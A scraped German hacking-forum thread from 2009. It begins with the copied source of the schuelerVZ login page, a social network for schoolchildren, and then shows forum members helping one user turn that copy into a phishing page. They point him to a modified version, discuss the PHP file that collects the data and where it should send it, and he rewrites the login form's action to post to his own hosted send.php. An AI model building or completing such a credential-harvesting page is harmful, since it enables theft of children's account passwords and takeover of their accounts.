function Adition_OSId(){var os;if((brs.search(/windows/)!=-1)||((brs.search(/win9\d{1}/)!=-1))){if(brs.search(/nt\s5\.1/)!=-1){os=3;}else if(brs.search(/nt\s5\.0/)!=-1){os=2;}else if(brs.search(/nt\s5\.2/)!=-1){os=8;}else if(brs.search(/nt\s6\.0/)!=-1){os=9;}else if((brs.search(/win98/)!=-1)||(brs.search(/windows\s98/)!=-1)){os=1;}else if(brs.search(/windows\sme/)!=-1){os=1;}else if((brs.search(/windows\s95/)!=-1)||(brs.search(/win95/)!=-1)){os=1;}else if((brs.search(/nt\s4\.0/)!=-1)||(brs.search(/nt4\.0/))!=-1){os=4;}return os;}else if(brs.search(/linux/)!=-1){return 6;}else if(brs.search(/mac\sos\sx/)!=-1){return 5;}else if((brs.search(/macintosh/)!=-1)||(brs.search(/mac\x5fpowerpc/)!=-1)){return 5;}else if((brs.search(/unix/)!=-1)||(brs.search(/x11/)!=-1)){return 7;}else{return -1;}}
function Adition_ResId(){if(screen.width==640&&screen.height==480){return 1;}else if(screen.width==800&&screen.height==600){return 2;}else if(screen.width==1024&&screen.height==768){return 3;}else if(screen.width==1152&&screen.height==864){return 4;}else if(screen.width==1280&&screen.height==1024){return 5;}else if(screen.width==1600&&screen.height==1200){return 6;}else if(screen.width==1280&&screen.height==960){return 7;}else if(screen.width==1400&&screen.height==1050){return 8;}else if(screen.width==1280&&screen.height==768){return 9;}else if(screen.width==1280&&screen.height==800){return 10;}else if(screen.width==1440&&screen.height==900){return 11;}else if(screen.width==1680&&screen.height==1050){return 12;}else if(screen.width==1920&&screen.height==1200){return 13;}return -1;}
function Adition_Flash(){var f="",n=navigator;if(n.plugins&&n.plugins.length){for(var ii=0;ii<n.plugins.length;ii++){if(n.plugins[ii].name.indexOf('Shockwave Flash')!=-1){f=n.plugins[ii].description.split('Shockwave Flash ')[1];i=f.indexOf('.');f=f.substr(0,i);break;}}}else if(window.ActiveXObject){for(var ii=10;ii>=2;ii--){try{var fl=eval("new ActiveXObject('ShockwaveFlash.ShockwaveFlash."+ii+"');");if(fl){f=ii;break;}}catch(e){}}}return f;}
var ad_wid = Math.round(Math.random()*2000000000);var ad_count = 0;var ref;try{ref=escape(document.referrer);}catch(e){re f='-'}var os;try{os=Adition_OSId();}catch(e){os=''}var browser;try{browser=Adition_BrowserId();}catch(e){ browser=''}var screen_res;try{screen_res=Adition_ResId();}catch(e ){screen_res=''}var fvers;try{fvers=Adition_Flash();}catch(e){fvers='' }
//]]>
</script></head>

<body class="pvz isNotLoggedIn gecko gecko19">
<div id="Grid-Wrapper">
<div id="Grid-Advertising-Top">
</div>
<div id="Grid-Advertising-Right">
</div>
<div id="Grid-Page">
<div id="Grid-Page-Left">

<div id="Logo">

<a href="/" rel="nofollow" title="zur Startseite">
<img src="http://static.pe.schuelervz.net/20090703-0/Img/logo.png" alt="Logo schülerVZ, Link zur Startseite" />
</a>
</div>

<form id="Loginbox" method="post" action="https://secure.schuelervz.net/Login">
<fieldset>
<label for="Login_email">E-Mail</label>
<input onfocus="this.hasfocus='yes';" class="text" type="text" name="email" id="Login_email" value="" />

<label for="Login_password">Passwort</label>
<input onfocus="this.hasfocus='yes';" class="text" type="password" name="password" id="Login_password" value="" />
<div class="form-row">
<input onfocus="this.hasfocus='yes';" type="checkbox" name="reminder" id="Login_remind" value="1" class="remind-login"/>
<label for="Login_remind">Eingeloggt bleiben</label>
<img class="loginTooltipIcon" src="http://static.pe.schuelervz.net/20090703-0/Img/tooltipp.gif" width="14px" alt="?"/>
<div id="reminder-hint" class="hidden">Setze dieses Häkchen nur, wenn außer dir niemand anderes diesen Computer verwendet. <a href="http://www.schuelervz.net/Newsroom/Detail/5c7c8d3134c3d2c9" rel="nofollow">Warum?</a>


</div>
</div>
<input onfocus="this.hasfocus='yes';" class="button" type="submit" name="login" value="Einloggen" />
<input type="hidden" name="jsEnabled" id="jsEnabled" value="false" />
<script type="text/javascript">
document.getElementById('jsEnabled').value = 'true';
</script>
<input type="hidden" name="formkey" value="c24c5f4990bfdbe3ad8de89e1d4ba17fd08a4e21e5b3ec9cc8 e212d5e9a1b93dd9dcc461ead145b67b5c7d34e441dd62181e 8d35f670d93259c056d35a5b81432967267b31cb9db280f707 109596a67a29a5c4116a89768b935158be3daa5dcc" />
<input type="hidden" name="iv" value="2ae4bb0426bcf7f7070c8a6b41d189fc" />

</fieldset>

</form>

<ul id="Grid-Navigation-Main" class="obj-linklist">
<li><a href="https://secure.schuelervz.net/Registration" rel="nofollow" title="Anmelden">Anmelden</a></li> </ul>

<div id="LeftsideBox">
<div>
<p>Schmei&szlig; ruhig mit Popcorn. Ich hab Steine dabei.</p> </div>

</div>

</div>
<div id="Grid-Page-Center">
<div id="Grid-Page-Center-Top">
<div id="Grid-Page-Center-Top-Title">
<img src="http://static.pe.schuelervz.net/20090703-0/Img/el_verzeichnis.png" alt="SCHÜLERVERZEICHNIS"/>
</div>
<div id="Grid-Page-Center-Top-Navigation">
<ul>

<li><a href="/Login" rel="nofollow" title="Einloggen">einloggen</a></li>
<li><a href="https://secure.schuelervz.net/Registration" rel="nofollow" title="anmelden">anmelden</a></li>
<li><a href="http://blog.schuelervz.net/category/klartext-schuelervz" title="klartext">klartext</a></li>
<li><a href="/l/help" rel="nofollow" title="hilfe">hilfe</a></li>
</ul>
</div>
</div>

<div id="Grid-Page-Center-Header">
<h1 class="ellipsis" title="Bist du schon drin?">Bist du schon drin?</h1>
</div>

<div id="Grid-Page-Center-Content">

<div id="shoutboxJs" class="obj-shoutbox hidden">
<div>
<p id="shoutboxJsSuccess" class="success hidden"></p>

<p id="shoutboxJsError" class="error hidden"></p>
</div>
<div class="close">
<a rel="nofollow" href="javascript:;"></a>
</div>
</div>

<div id="Mod-Default">

<div class="obj-box full no-float">
<div class="Snipplet-TopInfo">

</div>
<div class="Snipplet-Default-Overview">
<div class="Snipplet-Default-Overview-Info">
<img class="avatar" src="http://static.pe.schuelervz.net/20090703-0/Img/FrontBoy.png" alt="Avatar" />
<h2 class="alternate">Lass dich einladen!</h2>

<ul>
<li><span>Triff deine Freunde aus der Schule!</span></li>

<li><span>Wer kennt wen über wen?</span></li>


<li><span>Wer ist auf welcher Schule?</span></li>

<li><span>Wer sitzt in meiner Parallelklasse?</span></li>

<li><span>Wer hat wann Geburtstag?</span></li>


<li><span>Haben deine Freunde schon die Fotos vom Wochenende hochgeladen?</span></li>
</ul>
</div>


<div class="teaser-area">
<div class="teaser">
<a href="/Registration/" title="" rel="nofollow">Eingeladen?</a><br />
Los geht's </div>

<div class="teaser switch-to">
<a href="http://www.meinvz.net/Register" title="" rel="nofollow">Ausgeschult?</a><br />
Kein Schüler mehr - Ab zu meinVZ! </div>

</div>
</div>
</div>
</div> </div>

<div id="Grid-Page-Center-Footer">
<ul>
<li><a href="/l/schueler/" rel="nofollow" title="Schüler">Schüler</a></li>
<li><a href="/l/security/" rel="nofollow" title="">Sicherheit</a></li>

<li><a href="/l/parents" rel="nofollow" title="Eltern und Lehrer">Eltern und Lehrer</a></li>
<li><a href="/l/press" rel="nofollow" title="Presse">Presse</a></li>
<li><a href="/l/impressum" rel="nofollow" title="Impressum">Impressum</a></li>
<li><a href="/Terms/Current" rel="nofollow" title="AGB">AGB</a></li>
<li><a href="/Terms/Current/Policy" rel="nofollow" title="Datenschutz">Datenschutz</a></li>
<li><a href="/l/rules" rel="nofollow" title="Verhaltenskodex">Verhaltenskodex</a></li>

<li><a href="/Sitemap" title="Edelkompass">Edelkompass</a></li>
</ul>
</div>
<div>
</div>
</div>

<br class="Clear-The-Evil-Float" />
</div>

</div>


<script type="text/javascript" src="http://static.pe.schuelervz.net/20090703-0/Js/build/phx-core.js"></script>
<script type="text/javascript" src="http://static.pe.schuelervz.net/20090703-0/Js/source/class/phx/core/AdCollector.js"></script>
<script type="text/javascript" src="http://static.pe.schuelervz.net/20090703-0/Js/build/phx-start.js"></script>

<!-- SZM VERSION="1.6" -->
<script type="text/javascript">
/* <![CDATA[ */
var IVW="http://schuelvz.ivwbox.de/cgi-bin/ivw/CP/index_welcome;LoggedOut";
document.write("<div id=\"ivwbox\"><img src=\""+IVW+"?r="+escape(document.referrer)+"&d="+(Math.random()*100000)+"\" width=\"1\" height=\"1\" alt=\"\" name=\"szmimages\" /><\/div>");
/* ]]> */
</script>

<noscript>
<div id="ivwbox_noscript"><img src="http://schuelvz.ivwbox.de/cgi-bin/ivw/CP/index_welcome;LoggedOut" width="1" height="1" alt="" /></div>
</noscript>
<!-- /SZM -->

<script type="text/javascript">
/* <![CDATA[ */
var originalIvwSource = document.szmimages.src;

function ReloadPixelImages(PixelCode, PixelComment)
{
var IVW = "http://schuelvz.ivwbox.de/cgi-bin/ivw/CP/" + PixelCode + ";" + PixelComment;
document.szmimages.src = IVW + "?r=" + escape(document.referrer) + "&d=" + (Math.random() * 100000);
}

function ResetPixelImages()
{
var newIvwSource = originalIvwSource.substring(0, originalIvwSource.indexOf('&d=') + 3) + (Math.random() * 100000);
document.szmimages.src = newIvwSource;
}
/* ]]> */
</script>
<div id="adContainer"></div>
</body>
</html>

kriw
10.07.2009, 17:36
Weil du am Quellcode nix geändert hast!
Probiere es damit! (http://nopaste.free-hack.com/index.php?id=68e7203295)
Benützt mal die noPaste bitte :D

gonska
11.07.2009, 14:08
und mit der php-datei ist die korrekt???

kriw
11.07.2009, 14:23
Ja sie ist in Ordnung, doch willst du es auf deinem ftp Server weiterleiten?

lol und das mit gay@gay kannst du auch gleich ändern -.-

gonska
11.07.2009, 14:46
:D okay aba was soll ich dahinschreiben anstatt gay@gay???

Invisible1337
11.07.2009, 14:51
:D okay aba was soll ich dahinschreiben anstatt gay@gay???
Natürlich gay@du.de -.-

Nein, ist völlig egal, von mir aus auch haccckerr@fbi.gov oder so^^

gonska
11.07.2009, 15:45
okay danke ^^

klappt immer noch nicht -.- warum??? ich habe die index.html-datei von no paste kopiert was nicht funktioniert hat dann bin ich den quelltext durchgegangen und bemerkte :
<form id="Loginbox" method="post" action="ftp:send.php"> daruafhin dachte ich da muss wahrscheinlich das hin :<form id="Loginbox" method="post" action="ftp://gonska90:gonska90.bplaced.net/send.php">

hmm ist das so richtig ??? muss ich noch mehr bearbeiten liegst vllt doch an der php??? muss ich noch etwas bearbeiten???

würde mich um eine schnelle antwort freuen danke